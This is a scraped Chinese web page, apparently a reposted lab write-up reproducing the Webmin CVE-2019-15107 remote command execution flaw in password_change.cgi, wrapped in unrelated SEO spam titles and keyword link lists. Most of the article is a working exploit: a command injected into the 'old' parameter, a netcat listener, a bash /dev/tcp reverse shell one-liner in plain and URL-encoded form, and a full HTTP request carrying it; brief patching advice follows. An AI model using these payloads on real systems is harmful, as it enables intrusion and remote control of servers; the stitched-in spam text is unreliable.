当前位置: 首页 > news >正文

湖南沙坪建设集团有限公司网站大学学部网站建设工作

news 2025/12/27 16:12:17
湖南沙坪建设集团有限公司网站,大学学部网站建设工作,西安seo网站设计公司,建筑工程证书查询漏洞编号 CVE-2019-15107 webmin介绍 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作http://www.webmin.com/Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。是一个基于Web的界面…漏洞编号 CVE-2019-15107 webmin介绍 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作http://www.webmin.com/Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。是一个基于Web的界面用于Unix的系统管理。使用任何支持表和表单的浏览器可以设置用户帐户ApacheDNS文件共享等。 为什么用webmin Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了降低 Linux系统的管理难度有时候会对公司内的Linux主机或VPS系统预装了网页管理工具webmin 漏洞描述 该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。 该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。 影响版本 Webmin1.920 漏洞复现 环境搭建 使用docker搭建 进行登录https://127.0.0.1:10000/漏洞验证 https://192.168.16.176:10000/passwore_change.cgi 使用hackBar的post模式输入userrootxxpamexpired2oldtext|lsnew1test2new2test2 使用bp抓包 获得反弹shell kali虚拟机中输入 nc -lvvp 666bash -c bash -i /dev/tcp/192.168.16.176/666 01url编码 %62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%36%2e%31%37%36%2f%36%36%36%20%30%3e%26%31%22将反弹shell脚本url编码过后替换数据包中的old POST /password_change.cgi HTTP/1.1 Host: 192.168.16.176:10000 Cookie: redirect1; testing1 Content-Length: 62 Cache-Control: max-age0 Sec-Ch-Ua: Not?A_Brand;v8, Chromium;v108 Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: Linux Upgrade-Insecure-Requests: 1 Origin: https://192.168.16.176:10000 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://192.168.16.176:10000/passwore_change.cgi Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9 Sec-Fetch-User: ?1 Connection: closeuserrootxxpamexpired2old%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%36%2e%31%37%36%2f%36%36%36%20%30%3e%26%31%22new1test2new2test2获得shell成功 附带文件 wireshark 加固建议 直接升级到1.930版本 临时修补方案可以定位漏洞代码所在的行然后剔除后在github上下载password_change.cgi文件 参考信息 Vulhub - Docker-Compose file for vulnerability environment Webmin 远程命令执行漏洞CVE-2019-15107 webmin远程命令执行漏洞(CVE-2019-15107) 漏洞分类 Webmin 远程命令执行漏洞
http://wiki.neutronadmin.com/news/275761/

相关文章:

  • 政务咨询投诉举报网站建设无锡的网站建设公司
  • 响应式网站框架不用下载qq在线qq登录聊天
  • 网站开发语言总结有哪些中国传统美食网页制作素材
  • 怎么做网站的排名网站开发架构文档
  • 网站开发 安全验证南通做网站公司
  • 深圳做网站推广的公司网站建设的可行性分析报告
  • 东莞网站制作有名 乐云践新crm系统的销售管理功能包括
  • 昆明网站优化排名推广新手做网站需要什么
  • 南宁网站运营哪家好宝安在深圳算什么档次
  • 百度收录最快的网站手机怎么上wap网站
  • 广州 seo的网站电商seo推广
  • 网站网络营销阿里云自助建站教程
  • 营销型网站系统学ps有用还是网页制作
  • 网站建设 目的图片下载 wordpress
  • 福州网站免费制作微信接口文档
  • 网站下载系统如何做系统怎么进入网站后台图片
  • 缩短链接网站阿里巴巴专门做外贸的网站
  • 凡科网做的网站做网站要不要35类商标
  • 公司网站建设费用包括哪些加盟产品网站建设方案
  • 有专门做美发的网站吗网站文字不能编辑器
  • 成都建网站公司电话如何搭建 seo网站
  • 营销型网站建设思路网站编程设计方向
  • 网站开发技术部经理素质模型策划公司排名
  • 石龙镇网站建设怎么做装修网站平台
  • 建设中心小学网站制作好网站怎么导入
  • 大网站服务器维护费用怎么在id导入wordpress
  • 制作网站软件网站抖音账号权重查询
  • 注册网站有什么用网站源码建站视频
  • 邢台做网站优化价格优秀网页欣赏
  • 公司网站有哪些重要性山西网站建设费用